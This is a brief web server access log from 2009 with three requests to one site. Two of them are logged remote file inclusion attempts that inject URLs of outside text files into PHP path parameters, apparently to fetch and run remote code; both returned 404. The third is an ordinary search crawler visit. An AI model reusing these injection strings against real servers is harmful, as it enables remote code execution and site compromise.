190.144.44.36 - - [07/Sep/2009:11:38:26 -0700] "GET /logs/access_080313.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:38:30 -0700] "GET /bikes/dteel/WeSTOC07/ HTTP/1.0" 200 690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
97.83.114.220 - - [07/Sep/2009:11:38:55 -0700] "GET /logs/access_080723.log/?DOCUMENT_ROOT=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
